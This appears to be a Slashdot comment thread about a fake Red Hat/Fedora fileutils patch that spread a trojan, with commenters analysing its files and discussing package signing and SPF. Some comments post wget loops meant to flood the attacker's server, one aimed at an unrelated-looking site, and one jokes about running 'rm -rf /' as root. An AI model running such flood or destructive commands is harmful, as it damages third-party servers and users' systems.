      > The stupidest people I've ever met are the ones
      > who think they know everything."

      Ain't dat da truth!

      > Your average 14 year old who installs gentoo
      > and now considers himself a giant in the world
      > of computing fits the bill.

      I've not met a 14yo who isn't completely wedded to Windows myself. As always, YMMV. What with all "da mad gamez" and "teh free music on kazaa" and all, the last thing most of them are interested in is compiling stuff from source code.

      Slightly OT: I had a discussion this very weekend with a coupla 14 year olds. My nephew and his mate were visiting my place. Inevitably, I was asked whether they could "use the internet", so I sat them down at my Linux box and told them to go for it (I have a windows PC too, but I'm not stupid enough to let a pair of 14yo's surf the web with it)

      It didn't take long before they were asking me how they can download all the "free music from the internet". I asked them what they meant by that. Apparently, according to one of these kids, all you need is Windows + Windows Media Player and you can download free music from the internet. He had no idea you had to pay a buck a song for the privilege, let alone that it came fully infected with MS DRM. I haven't actually tried MSN music store, but I'm pretty sure that your chances of downloading the latest Usher crapfest from there for free are just about zero. Of course the subject of Kazaa followed soon after. I put the kibosh on that as well.

      I don't hold out much hope for the next generation of geeks, I must say.

      --
      "You can't fight in here, this is the war room!"
    8. Re:Stupid Tricks? by _Sprocket_ · · Score: 1


      I don't hold out much hope for the next generation of geeks, I must say.


      That's not the next generation of geeks. That's the usual consumer who's finally adopting technology that had been the cutting edge realm of geeks past.
    9. Re:Stupid Tricks? by thinkninja · · Score: 1

      SELinux with a strict policy. However, Fedora/Redhat found that a strict policy tends to break too much stuff, from what I gather, and have instead created a 'targeted' policy to lock down daemons such as dhcpd, httpd, syslogd, etc.

      Of course, ultimately a user can destroy any system they have local access to with enough perseverance. That's their prerogative :(

      --
      "The number of Unix installations has grown to ten, with more expected." (Unix Programmer's Manual, 2nd ed.; june 1972)
    10. Re:Stupid Tricks? by Anonymous Coward · · Score: 0

      Or keyboard

    11. Re:Stupid Tricks? by Anonymous Coward · · Score: 0

      >> What can be done to prevent this from happening in the future?

      Nothing.

      You can't make things foolproof because fools are so ingenious.

    12. Re:Stupid Tricks? by Anonymous Coward · · Score: 0

      as a community we need to address these types of issues.

      We do. The man just told you; tell them to rm -rf / as root. That addresses the issue nicely.

    13. Re:Stupid Tricks? by Anonymous Coward · · Score: 0

      The stupidest people I've ever met are the ones who think they know everything

      So that would be you and who else?

  14. Surprisingly by Mentorix · · Score: 4, Funny

    Running untrusted code can result in system compromise.

    Everyone checks the gpg signatures right?

    1. Re:Surprisingly by squarefish · · Score: 1

      I wouldn't be so sure that everyone even has the slightest idea of how to begin in checking the gpg signature

      --
      Creationists are a lot like zombies. Slow, but powerful and numerous. And they all want to eat our brains.
    2. Re:Surprisingly by bcs_metacon.ca · · Score: 1

      You don't have to. If you use a package installer like up2date, yum, or apt, they will complain loudly if a package isn't appropriately signed. This all happens without the user knowing anything about it. And unlike Windows, there's no inviting "Trust this software? Yes/No" dialog -- turning off trust is a little more complicated than that, and requires administrator access.

      --
      How appropriate. You fight like a cow.
    3. Re:Surprisingly by Rykky · · Score: 1

      Well.. RedHat distros have you import their GPG key into RPM the first time you run up2date. Then RPM takes care of the signature checking for us and cries bloody murder when a package isn't signed or is signed incorrectly.

  15. Slashdot by Anonymous Coward · · Score: 0

    I would not worry, this page will prob be hit by the slashdot effect and be taken down just by that....

  16. Use the /. effect for good by JamesTRexx · · Score: 3, Funny

    Now if each time someone tries this sort of thing they get their server posted here on slashdot, we could actually do something good with the slashdot effect and put their server up in smoke before much damage is done. :-D

    --
    home
    1. Re:Use the /. effect for good by sfire · · Score: 0, Redundant

      And how much you want to bet that the server was hacked, and the real owner of the server is going to have to foot the bill?

    2. Re:Use the /. effect for good by joeljkp · · Score: 1
      $ while true; do wget http://fedora-redhat.com/index.htm; rm index.htm; sleep 1; done
      --
      WeRelate.org - wiki-based genealogy
    3. Re:Use the /. effect for good by YOU+LIKEWISE+FAIL+IT · · Score: 1

      Just fyi, instead of using rm, use the --delete-after option to wget.

      YLFI
      --
      One god, one market, one truth, one consumer.
    4. Re:Use the /. effect for good by Anonymous Coward · · Score: 0
      while true; do wget --cache=off http://eyetech.co.uk/DOWNLOAD/CYBER011.LHA; rm CYBER011.LHA; sleep 1; done
      Kill these scriptkiddie fuckers. Kill them hard.
    5. Re:Use the /. effect for good by C_Kode · · Score: 1

      Just fyi, instead of using --delete-after option run wget from /dev/null ;)

      One less operation, and the deed is still done.

    6. Re:Use the /. effect for good by SnowZero · · Score: 1

      Yay we win! The site is down now; After 300 downloads it doesn't work anymore :) I was using the following to keep rough track of how many downloads I was doing:

      for (( i=0; i<100; i++ )) do { wget -O /dev/null www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz } done

    7. Re:Use the /. effect for good by rts008 · · Score: 1

      I can see the smoke from here! I hope he feels the flames from his box crawling up his ass like wildfire. GOOD JOB!

      --
      Down With Slashdot BETA!!! I've been around the corner and seen the oliphant; you can only abuse me from your perspecti
  17. Cry havoc! by LittleLebowskiUrbanA · · Score: 1

    and let slip the trolls of Slashdot! Let's see how long before this guy gets hacked and his personal IP address/physical address are posted on here.

    You can almost feel sorry for the guy :)

    1. Re:Cry havoc! by sfire · · Score: 1, Redundant

      And how much you want to bet that the server was already hacked, and the real owner of the server is going to have to foot the bill?

    2. Re:Cry havoc! by LittleLebowskiUrbanA · · Score: 1

      Yeah, this will be an interesting write up sooner or later. First of its kind for OSS if I'm not mistaken. Guess we're finally Enterprise level Microsoft now.

    3. Re:Cry havoc! by Anonymous Coward · · Score: 0

      You're saying an innocent third party had a domain called "fedora-redhat.com" ? Sorry, you'll not get any sympathy here.

    4. Re:Cry havoc! by suckmysav · · Score: 1

      If I was to hack into an innocent parties server and gain control of its webserver program (or even install one of my own) then there is nothing to stop me from also; a) ascertaining its IP address b) registering a domain c) pointing www.bodgy-domain.com at that IP address d) loading the trojan and a webpage onto the compromised server e) profit!

      --
      "You can't fight in here, this is the war room!"
  18. Source code! by pac1085 · · Score: 1

    Well, whatever it is, it comes with its source code! inst.c is in the tarball, check it out.

    1. Re:Source code! by Anonymous Coward · · Score: 1, Insightful

      Inst.c is just a compiled shell script. The actual code is in fileutils-patch.bin.

    2. Re:Source code! by andfarm · · Score: 1
      Nope.

      inst.c is the core of the program; fileutils-patch.bin is chaff - it isn't used.

      --
      TANSTAAFI: There Ain't No Such Thing As A Free iPod.

  19. Confidence by FiReaNGeL · · Score: 2, Insightful

    OK, we all know no Linux Guru will ever fall for this kind of stupid trick.

    But imagine a world where Linux overwhelms Microsoft as the #1 desktop OS. Millions of Moms and Pops everywhere, using Linux. Who will they trust for their "updates"? I know for sure lots of them would fall for this particular trick, and it's one of the first times we see this. Lots of distros, lots of sources, lots of patches, major confusion.

    Question (as I don't use Linux yet): Do some of the major distros (Redhat, etc) have a webservice for updates, akin to windowsupdate.com? I sure hope so; it's essential for further desktop market share increase.

    1. Re:Confidence by bcs_metacon.ca · · Score: 1

      Yes, of course they do. Red Hat Enterprise has Red Hat Network, SUSE has YOU, and Fedora Core has GPG signed distro channels.

      When I set up a system for a "non-technical user", I set up the patches to be automatic (they go through a rigorous QA assessment -- I've never seen a "bad" patch in a final version of Fedora Core). I also don't give the NTU the root password, or install development utils -- so there's no way this phish/trojan could affect one of the systems I administer.

      --
      How appropriate. You fight like a cow.
    2. Re:Confidence by FiReaNGeL · · Score: 1

      I hate to show my ignorance, but this is an excellent thing ;) And...

      In Soviet Russia, SUSE has YOU! :P

    3. Re:Confidence by Mentorix · · Score: 1

      Yes, redhat has a web-based update page, but you can do it semi-automatically as well now. Doesn't work as well as with some other distros in my experience.

      Debian and Gentoo have built software management policies right into their core system. Just click on update and let the machine take care of itself. All annoying dependency stuff gets taken care of by itself and security updates can be scheduled to run automatically.

    4. Re:Confidence by dtfinch · · Score: 2, Informative

      Do some of the major distros (Redhat, etc) have a webservice for updates, akin to windowsupdate.com? I sure hope so; it's essential for further desktop market share increase.

      For the most part, they all do, even most of the little ones. Typing "yum -y update" at the command line keeps me up to date, or I could enable the cron job to do it automatically each night.

    5. Re:Confidence by Anonymous Coward · · Score: 0

      There is no web service.

      We go:

      apt-get update
      apt-get upgrade

      or

      yum upgrade

      It patches all our programs from games to OS to system utilities to word processors.

      Unlike Windows, which only works on the core OS.

    6. Re:Confidence by Biogenesis · · Score: 1

      I know that Debian has an apt repository that's something like security.debian.org, if it's in your sources.list apt will get updates from it when you ask it (apt-get dist-upgrade for example). I'm fairly sure Redhat has a similar thing via some update program but I've only opened it and had a poke around, never actually used it for anything.

    7. Re:Confidence by scottking · · Score: 1

      i'd agree if you didn't have to compile your own viruses.

      --
      scott king
    8. Re:Confidence by FuzzyBad-Mofo · · Score: 1

      Debian and Gentoo have built software management policies right into their core system.

      So does Fedora (and Red Hat). It's made me an apt fan. :)

    9. Re:Confidence by Anonymous Coward · · Score: 0

      Sounds like you haven't been running RH in say... three years or so?

      Hint: RH has full-auto system, just as much "in the core" as are those of the rest, and has had for a long while.

      But hey, don't let that get in a way of FUD'ing, who cares about those pesky facts anyway?

    10. Re:Confidence by shish · · Score: 1
      a webservice for updates, akin to windowsupdate.com?

      Nearly all of them do; and unlike windows update, the linux updates are for /all/ the software on the PC, not just the company's own stuff. They also tend to allow you to search through lists of hierarchically organised trees of software, and install / uninstall at the check of a box, with dependencies and the like accounted for automatically.

      --
      I mod down anyone who says "I will be modded down for this", regardless of the rest of their comment
  20. Looking at the files.. by schmiddy · · Score: 1, Informative

    First of all, this site should be shut down immediately. I'm not sure exactly what laws apply, but they're definitely guilty of spamming and spreading trojans, that should be enough in and of itself to notify their hosting provider.

    I downloaded that tar file off the site to take a look at it. It contains a makefile, an inst.c , and a binary file "fileutils-patch.bin".

    Looking at inst.c, I'm too lazy to figure out all the code on my own, but it's well commented and the functions are properly named, proper indentation, etc. (I suspect they probably just ripped off some open source programs, modified the code a bit, and turned it into a trojan.)

    I think there's at least stuff in there to crack your password file since I see:
    key(pswd, sizeof(pswd_t));
    in there. I'm guessing the binary patch file does some nasty stuff as well.

    P.S. I just looked at the binary file through strings. It is indeed a rip-off of some GPL program, since the following text is included at the beginning of the file:

    fileutils-4.1.9-11
    =u9F!
    5928f30d339e2c8002986120e6abd2e7d4e61921
    =u9F!
    fileutils
    4.1.9
    The GNU versions of common file management utilities.
    The fileutils package includes a number of GNU versions of common and popular file management utilities. Fileutils includes the following tools: chgrp (changes a file's group ownership), chown (changes a file's ownership), chmod (changes a file's permissions), cp (copies files), dd (copies and converts files), df (shows a filesystem's disk usage), dir (gives a brief directory listing), dircolors (the setup program for the color version of the ls command), du (shows disk usage), install (copies files and sets permissions), ln (creates file links), ls (lists directory contents), mkdir (creates directories), mkfifo (creates FIFOs or named pipes), mknod (creates special files), mv (renames files), rm (removes/deletes files), rmdir (removes empty directories), sync (synchronizes memory and disk), touch (changes file timestamps), and vdir (provides long directory listings). daffy.perf.redhat.com
    Red Hat Linux
    Red Hat, Inc.
    Red Hat, Inc.
    Applications/File
    linux
    i386

    --
    http://cltracker.net -- powerful craigslist multi-city search
    1. Re:Looking at the files.. by Qzukk · · Score: 1

      According to "file" it's an rpm renamed to .bin

      Looking through the code, we have a function called untraceable() which runs as a separate process and kills the program if someone attempts to trace or debug it, but as distributed, this is not enabled.

      There's also an expiration option, which is currently disabled. It also apparently attempts to keep track of its operation by setting an environment variable starting with "x" then running itself again.

      The rest of it seems to be encrypted in the large constant strings at the top of the page (these are expressed in octal).

      --
      If I have been able to see further than others, it is because I bought a pair of binoculars.
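      Qzukk's observation that "file" recognises the .bin as a renamed RPM rests on the fixed 96-byte lead at the start of every RPM package. The Python below is an added example, not code from the thread or from the trojan: it parses that lead and reports the package name and type, so a renamed extension does not hide what the file is. The sample lead it builds is constructed here (reusing the name from schmiddy's strings output) and is not bytes from the actual file; the archnum/osnum/sigtype values are the conventional i386/Linux/header-signature ones, assumed for the example.

```python
import struct

# RPM "lead": the fixed 96-byte structure at the start of every .rpm file.
# Layout (big-endian): magic[4], major, minor, type, archnum, name[66],
# osnum, signature_type, reserved[16].
RPM_LEAD_MAGIC = b"\xed\xab\xee\xdb"
RPM_LEAD_FORMAT = ">4sBBhh66shh16s"
RPM_LEAD_SIZE = struct.calcsize(RPM_LEAD_FORMAT)  # 96
PACKAGE_TYPES = {0: "binary", 1: "source"}


def parse_rpm_lead(data):
    """Return a dict describing the RPM lead, or None if data does not start with one."""
    if len(data) < RPM_LEAD_SIZE:
        return None
    fields = struct.unpack(RPM_LEAD_FORMAT, data[:RPM_LEAD_SIZE])
    magic, major, minor, pkg_type, archnum, name, osnum, sigtype, _reserved = fields
    if magic != RPM_LEAD_MAGIC:
        return None  # not an RPM, whatever the file extension says
    return {
        "version": f"{major}.{minor}",
        "type": PACKAGE_TYPES.get(pkg_type, f"unknown({pkg_type})"),
        "archnum": archnum,
        "osnum": osnum,
        "signature_type": sigtype,
        # name is NUL-padded to 66 bytes
        "name": name.split(b"\0", 1)[0].decode("ascii", "replace"),
    }


def build_rpm_lead(name, major=3, minor=0, pkg_type=0, archnum=1, osnum=1, sigtype=5):
    """Constructed lead for the example; NOT bytes taken from the trojan's file.

    Defaults assume an RPM v3.0 binary package for i386 (archnum 1) on Linux
    (osnum 1) with a header-style signature section (sigtype 5).
    """
    padded = name.encode("ascii")[:65].ljust(66, b"\0")
    return struct.pack(RPM_LEAD_FORMAT, RPM_LEAD_MAGIC, major, minor,
                       pkg_type, archnum, padded, osnum, sigtype, b"\0" * 16)


def identify(data):
    """One-line description of the file, in the spirit of what 'file' reports."""
    lead = parse_rpm_lead(data)
    if lead is None:
        return "not an RPM (no lead magic)"
    return f"RPM v{lead['version']} {lead['type']} package '{lead['name']}'"


if __name__ == "__main__":
    # Constructed sample: the name seen in the strings output, followed by
    # some filler standing in for the signature and header sections.
    sample = build_rpm_lead("fileutils-4.1.9-11") + b"\0" * 16
    print(identify(sample))                       # RPM v3.0 binary package 'fileutils-4.1.9-11'
    print(identify(b"\x7fELF" + b"\0" * 92))      # not an RPM (no lead magic)
```

      The lead only names the package; whether the signature section that follows it is valid is what rpm's signature check (Rykky's "cries bloody murder") decides, and that is the check a renamed file never gets when installed by hand.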
    2. Re:Looking at the files.. by Poleris · · Score: 1

      "First of all, this site should be shut down immediately."

      Exactly! Good thing T posted up the real link, now let's watch as it gets /.'ed to death.

    3. Re:Looking at the files.. by Anonymous Coward · · Score: 0
      now let's watch as it gets /.'ed to death.

      Yeah, good luck slashdotting it.

      $ host www.fedora-redhat.com
      www.fedora-redhat.com is an alias for premium4.geo.yahoo.akadns.net.
    4. Re:Looking at the files.. by Negative+Response · · Score: 1

      Compare that C code with this C file. I'd guess it's a small rpm installer, just in case you are not using a rpm based system.

  21. Nice spelling by Anonymous Coward · · Score: 0

    Thoughtful post though!

  22. The amazing thing is by antifoidulus · · Score: 1

    They seem to be able to master phishing and obfuscated code, but they just can't get the English language:
    Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only.

    1. Re:The amazing thing is by Rick+Zeman · · Score: 1

      They seem to be able to master phishing and obfuscated code, but they just can't get the English language:

      Sounds like CDR Taco who mastered perl's syntax, but not that of American English.

  23. Re:Must be some mistake by Anonymous Coward · · Score: 0

    You're an idiot.

  24. Re:Must be some mistake by Nikker · · Score: 1

    But did they allow you to download the source ???

    --
    A loop, by its nature, continues. If that didn't make sense, start reading this sentence again.
  25. Re: text by Inf0phreak · · Score: 5, Insightful

    Why post the text instead of having the /. crowd flood their server to see what they've put up there? Potentially that could bring the server offline and cost them a bundle for a great two-sided effect (OK, the latter is not that cool if it's just some rooted box, but at least it would prevent anyone being affected if it was /.'ed to hell).

    --
    ________
    Entranced by anime since late summer 2001 and loving it ^_^
  26. Trademark infringement... by }InFuZeD{ · · Score: 0

    I'd like to see Redhat sue the owner of the domain for trademark infringement ;)

    Obviously it was a malacisious use of the domain, and I think the verdict is pretty much secured, so it would be fun.

    1. Re:Trademark infringement... by }InFuZeD{ · · Score: 2, Funny

      Ok, that was a horrible misspelling of malicious :|

    2. Re:Trademark infringement... by balster+neb · · Score: 0

      Not only is the domain infringing their trademark, he's also using their logo and pretending to be them.

      This guy is going to be in deep trouble. Red Hat will take this pretty seriously IMO.

  27. PHEW! by big+daddy+kane · · Score: 5, Funny

    I'm sure glad I'm using windows!

    1. Re:PHEW! by Anonymous Coward · · Score: 0, Funny

      Sooner or later, one of these is gonna compile under Cygwin...

    2. Re:PHEW! by Anonymous Coward · · Score: 0

      You shouldn't be glad--just because one potential virus has been created for the few dumb and/or gullible linux users doesn't mean windows is safe. It's infinitely less secure and anyone with common sense shouldn't fall for this scam either.

    3. Re:PHEW! by M51DPS · · Score: 1

      Sooner or later, one of these is gonna compile under Cygwin...

      I wonder how well it will compile under Mac OS X. We are now compatible with everything Unix, including phishing scams!

    4. Re:PHEW! by Anonymous Coward · · Score: 0

      Cool!

  28. does it or not ? by Matt_Joyce · · Score: 2, Insightful

    It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code."


    Either it is malicious or not.
    Don't they know ?

    If it does; explain what it does and how to mitigate the damage.
    If it does not; let people know so emotional energy can be use elsewhere.

    What's the definition of 'malicious code' anyway?
    Presumably any code you don't want running is malicious.
    Creating a temp file would be a malicious use of disk space, etc.

    1. Re:does it or not ? by ln+-sf+head+ass · · Score: 1

      It's lawyer-speak. They want to convey it's malicious, but don't want them to open themselves up to a libel suit. Yes, it's dumb.

  29. Most users, sure by JustOK · · Score: 1

    Sure, I'm hoping that > 99.99999% of current users will spot this within seconds. Yet, I thought I heard the idea was to get more people using linux. That would include a number of people who get infected in dumb ways on MS. Unless their machines are totally locked down (or adminned by the "linite"), it's gonna happen. Maybe it happening now, and proper defenses being designed, will be a good thing.

    --
    rewriting history since 2109
  30. Spelling/Grammar? by hereschenes · · Score: 2, Informative

    "Anybody running RedHat and Fedora are strongly adviced to apply this patch!"

    Why can't scammers ever spell? Someone send them a copy of Strong Bad's "Rhythm 'n' Grammar", quick!

    --
    More like... nerdular nerdence!
    1. Re:Spelling/Grammar? by ScrewMaster · · Score: 1

      Probably because most of them are in Nigeria.

      --
      The higher the technology, the sharper that two-edged sword.
    2. Re:Spelling/Grammar? by bani · · Score: 1

      a growing % of these criminals are from saudi arabia or the netherlands.

      they still can't spell for shit though.

    3. Re:Spelling/Grammar? by lowlands · · Score: 1

      No they are not *from* the Netherlands. They are Nigerians *living* in the Netherlands. In the "Bijlmer" area of Amsterdam to be exact. At least until recently because they got their sorry asses kicked out of the country.

    4. Re:Spelling/Grammar? by khrtt · · Score: 1

      He's Romanian:

      http://www.google.com/search?hl=en&q=inca+un+root+frate+belea&btnG=Google+Search

      See how most of the results are in .ro? He must be Romanian.

    5. Re:Spelling/Grammar? by bani · · Score: 1

      there still seem to be lots of them. dutch ISPs don't seem too worried about getting rid of them, seeing as i will get repeat nigerian scams from the same ip address for weeks or months on end. eg tiscali.nl, home.nl, solcon.nl, bbeyond.nl, concepts.nl...

      i have to wonder though -- why is the netherlands the favorite residence of nigerian criminals, next to their native nigeria?

      meh, i guess i sort of answered my own question... dutch ISPs are lazy, that's why nigerian criminals love to operate their scams in the netherlands.

  31. Re: I'll try it... Execution results! by enginuitor · · Score: 5, Informative

    Identifying the system. This may take up to 2 minutes. Please wait...
    adduser: No more than two names.
    passwd: Unknown user bash
    Could not load host key: /etc/ssh/ssh_host_key
    Could not load host key: /etc/ssh/ssh_host_rsa_key
    Could not load host key: /etc/ssh/ssh_host_dsa_key
    Disabling protocol version 1. Could not load host key.
    Disabling protocol version 2. Could not load host key.
    sshd: no hostkeys available -- exiting.
    System looks OK. Proceeding to next step.

    Patching "ls": ###########
    Patching "mkdir": ##########

    System updated and secured successfully. You may erase these files.

  32. Linux - Where the malware comes with the source by cranos · · Score: 5, Funny

    Dammit why does Linux have to be so complicated, I mean damn you have to compile your own viruses and everything!!!!

    1. Re:Linux - Where the malware comes with the source by Chrispy1000000+the+2 · · Score: 1

      Hey, just be thankful that you *might* not know what you are compiling. You require *real* user intervention to use that viral sig that pops up from time to time.

      --
      Sig
    2. Re:Linux - Where the malware comes with the source by /dev/trash · · Score: 5, Funny

      You think you have it bad? I run Gentoo. I'm still compiling all the files needed for this one to run.

    3. Re:Linux - Where the malware comes with the source by eyepeepackets · · Score: 1

      WOo, great laugh, that was seriously funny!

      Thanks!

      --
      Everything in the Universe sucks: It's the law!
    4. Re:Linux - Where the malware comes with the source by Anonymous Coward · · Score: 0
      Be glad you're not on *BSD. Not only is BSD dying,
      but I'll have to wait a week for someone to get this
      virus working on a BSD system then upload it to
      pkgsrc and only then will I be able to download and
      compile it (after the patches of course).


      If you can't tell, I use NetBSD. :)

    5. Re:Linux - Where the malware comes with the source by Ziviyr · · Score: 1

      A Commodore 128 would be twice as fast as your Commodore 64, and you'd swap memory less too!

      --
      Someone set us up the bomb, so shine we are!
    6. Re:Linux - Where the malware comes with the source by jmv · · Score: 1

      But RedHat already has a patch out:

      rpm -e gcc

    7. Re:Linux - Where the malware comes with the source by Stevyn · · Score: 1

      to speed it up, try this command:

      # ACCEPT_KEYWORDS="~virus" emerge --oneshot trojan

      make sure you enable -funroll-loops and -pipe or else the program runs waaay too slowly. Don't use GCC 3.4 or else it fails.

    8. Re:Linux - Where the malware comes with the source by Antique+Geekmeister · · Score: 1

      Actually, that's a damn good idea. For non-developer systems, such as firewalls, file servers, mail servers, etc., it's basic security to remove the compiler to avoid exactly this sort of local compilation, either by an idiot user or by a script kiddie's successfully installed package. Think of it as disabling an unnecessary network port.

  33. Re: I'll try it... Execution results! by Peridriga · · Score: 1

    Well... That's all well and good... How about actually posting the source and what it does instead of the output...

  34. Use SPF to protect yourself from phishing by taubz · · Score: 5, Informative

    If your mail client checked From: addresses against SPF records in DNS, you'd know immediately this was a hoax. Redhat.com fortunately publishes SPF records and -- score one for SPF -- they can be used to identify with 100% accuracy that the mail is not legitimate.

    How can you get your mail client to check SPF records automatically? Download the Thunderbird SPF Extension.

    (Disclosure: I wrote the plugin. :) )

    1. Re:Use SPF to protect yourself from phishing by Anonymous Coward · · Score: 0

      But how do we know that it isn't a trojan? (Is an unsigned, third party extension, not on official update site)

    2. Re:Use SPF to protect yourself from phishing by taubz · · Score: 1

      Download it, unzip it, and inspect the code!

    3. Re:Use SPF to protect yourself from phishing by ender81b · · Score: 1

      cool extension. Of course, now I just realize that the ISP I work for doesn't publish SPF records (although we do use SPF odd). Oh well. nifty little plugin.

    4. Re:Use SPF to protect yourself from phishing by cortana · · Score: 3, Informative

      I don't see the original email, but I'd bet that it came from something@fedora-redhat.com, and so the SPF record for redhat.com would not have been useful in this case. :)

      On another note, concerning your SPF plugin: I have two points you may wish to consider (if you already have, then fair enough).

      1. The From address used by the plugin comes from the From: header in the message? I thought you're not supposed to do this with SPF; it specifies that you should check the SMTP envelope sender (the MAIL FROM line from the SMTP dialogue). This information is not available to a MUA in any standard form AFAIK.

      2. What happens if I open a message I stored from a few months/years ago, and the SPF record for the domain it's from has changed? Does the plugin validate a message whenever one is opened, and will I end up with a false positive/negative?

      I believe these two issues are why SPF checking must be performed on the server side. The mail server alone has reliable access to the SMTP envelope sender, and can add a Received-SPF header at the time of message reception, which is the only time when it is guaranteed that the SPF records from DNS are relevant to the message in question.

      SPF done on the client side basically turns into MICROS~1's (patented, if you believe that they'll allow crap like this to be patented!) Sender-ID system, where the From address is taken from a selection of message headers.

      Of course, if I'm wrong about any of this, please correct me. :)

    5. Re:Use SPF to protect yourself from phishing by bigberk · · Score: 2, Insightful
      This is misleading. SPF might help verify that this email didn't come from redhat.com, but SPF isn't going to help you in general:
      • The envelope sender could have not been @redhat.com but the From field could have contained redhat.com; then, there is no SPF to check and you can't benefit from redhat's SPF record
      • The sender could have used a fedora-redhat.com address and published an SPF record for their own domain. Spammers already do this. The SPF check tells you nothing about authenticity. The SPF check would succeed, and it could still be a forgery.
    6. Re:Use SPF to protect yourself from phishing by taubz · · Score: 1

      > I'd bet that it came from something@fedora-redhat.com

      Check out the link I posted and see the screenshot -- it worked. The From: address was @redhat.com.

      > The From address used by the plugin comes from the From: header in the message?

      Yes. Does it matter that the SPF spec says to use the return path? Is this any less useful?

      > 2. What happens if I open a message I stored from a few months/years ago

      It will only check very recent messages. In other cases it will show a warning.

      The extension isn't meant to replace SPF at the MTA level; it's meant to complement it. It's another layer of badly needed protection.

    7. Re:Use SPF to protect yourself from phishing by taubz · · Score: 1

      I admit I may have exaggerated SPF's usefulness, but that's not a fair characterization either.

      Without SPF, you don't know anything about the source of an email. With SPF at least you know the domain it came from. You may not know who owns the domain, but you do have one more piece of reliable information than you had before.

    8. Re:Use SPF to protect yourself from phishing by Bloater · · Score: 2, Funny

      How do we know this isn't a trojan ;)

    9. Re:Use SPF to protect yourself from phishing by cortana · · Score: 2, Informative

      > Check out the link I posted and see the screenshot -- it worked. The From: address was @redhat.com.

      The point is that you cannot tell. The From header in the email itself tells you nothing. It is forgery of the SMTP envelope sender that SPF guards against.

      Consider:

      220 some mailserver... ready!
      MAIL FROM: sneaky@fedora-redhat.com
      250 OK
      RCPT TO: some_innocent@hotmail.com
      250 OK
      DATA
      354 you have a go
      From: security@redhat.com
      Subject: EMERGENCY SECURITY PATCH APPLY NOW!

      Etc etc. The SPF check is performed against sneaky@fedora-redhat.com--as per the SPF specification. The recipient of the message never sees sneaky@fedora-redhat.com, however, and is none the wiser.

      SPF certifies the envelope sender of a message, ensuring that an email has a non-forged return path.

      > Yes. Does it matter that the SPF spec says to use the return path? Is this any less useful?

      Yes, and yes! Standards exist for a reason, ne? From the SPF FAQ:

      ---8---

      Does [SPF] protect the "From:" header field?

      SPF was designed to protect the envelope sender. That means the return-path that shows up in "MAIL FROM", and to a lesser extent the HELO argument that is supposed to be an FQDN. ...

      Protecting authorship information is an important goal. However, the technical issues associated with protecting the "From:" header are much more numerous and challenging. The best way to protect the header "From:" is by using a cryptographic signature such as S/MIME, PGP, or (when it is released) Yahoo DomainKeys.

      If you want to use the "From:" header as the subject of authentication with SPF, you need to be familiar with the following:

      * mailing lists
      * /etc/aliases-style forwarding
      * MUA "resend this message to"
      * web-generated email
      * the Sender header
      * the Resent-Sender and Resent-From headers

      ---8---

      Checking the From header at the MUA would prevent me, for example, sending email from anywhere except my ISP's servers. I would no longer be able to set up remailers to allow me to have mail from several addresses sent to my main address, and so on. Other stuff as in the list above will also break...
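
The envelope-versus-header distinction in the exchange above, as an added example that is not part of the original thread or of any SPF implementation: a small Python script parses a constructed message whose Return-Path (the envelope sender the receiving MTA recorded from MAIL FROM) and From: header name different domains, evaluates a constructed SPF record for each domain against the connecting IP (the records, hostnames and IP are assumptions standing in for DNS), and reports whether the two domains line up. The SPF pass on the envelope domain says nothing about the From: header; the mismatch between the two is what a mail filter would want to surface.

```python
import ipaddress
import re
from email import message_from_string

# Constructed message, modelled on the SMTP dialogue quoted above: the receiving MTA
# records the MAIL FROM address in Return-Path, while the From: header says redhat.com.
SAMPLE_MESSAGE = """\
Return-Path: <sneaky@fedora-redhat.com>
Received: from mx.fedora-redhat.test ([192.0.2.10]) by mail.recipient.test
From: security@redhat.com
Subject: EMERGENCY SECURITY PATCH APPLY NOW!

Apply the attached patch now.
"""

# Constructed SPF records standing in for DNS TXT lookups (assumed values, not real records).
# The sender's own domain authorises the connecting IP; redhat.com does not.
FAKE_DNS = {
    "fedora-redhat.com": "v=spf1 ip4:192.0.2.0/24 -all",
    "redhat.com": "v=spf1 ip4:198.51.100.0/24 -all",
}

RESULT_FOR_QUALIFIER = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def domain_of(addr):
    """Return the lower-cased domain part of an address such as '<user@example.test>'."""
    m = re.search(r"@([A-Za-z0-9.-]+)", addr or "")
    return m.group(1).lower() if m else None


def spf_check(domain, client_ip, dns=FAKE_DNS):
    """Minimal SPF evaluation: ip4 mechanisms and the 'all' catch-all only (no include/a/mx)."""
    record = dns.get(domain)
    if record is None or not record.startswith("v=spf1"):
        return "none"
    ip = ipaddress.ip_address(client_ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in RESULT_FOR_QUALIFIER:
            qualifier, term = term[0], term[1:]
        if term.startswith("ip4:") and ip in ipaddress.ip_network(term[4:], strict=False):
            return RESULT_FOR_QUALIFIER[qualifier]
        if term == "all":
            return RESULT_FOR_QUALIFIER[qualifier]
    return "neutral"


def analyse(raw_message, client_ip):
    """Evaluate SPF as specified (envelope sender) and compare with the header From domain."""
    msg = message_from_string(raw_message)
    envelope_domain = domain_of(msg.get("Return-Path"))
    header_domain = domain_of(msg.get("From"))
    return {
        "envelope_domain": envelope_domain,
        "header_from_domain": header_domain,
        "spf_envelope": spf_check(envelope_domain, client_ip),
        # What a From:-header check (not SPF as specified) would have produced, for contrast.
        "spf_header_from": spf_check(header_domain, client_ip),
        "aligned": envelope_domain == header_domain,
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_MESSAGE, "192.0.2.10").items():
        print(f"{key}: {value}")
```

Run stand-alone it prints a pass for the envelope domain, a fail for the header domain and aligned: False; the only reliable conclusion an MTA can draw from the pass is that 192.0.2.10 is allowed to send mail for fedora-redhat.com, which is exactly what the poster above is pointing out.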

    10. Re:Use SPF to protect yourself from phishing by Val314 · · Score: 1

      thanks, but your server is sending this as plain text, maybe its time to check the mime settings

    11. Re:Use SPF to protect yourself from phishing by Antique+Geekmeister · · Score: 1

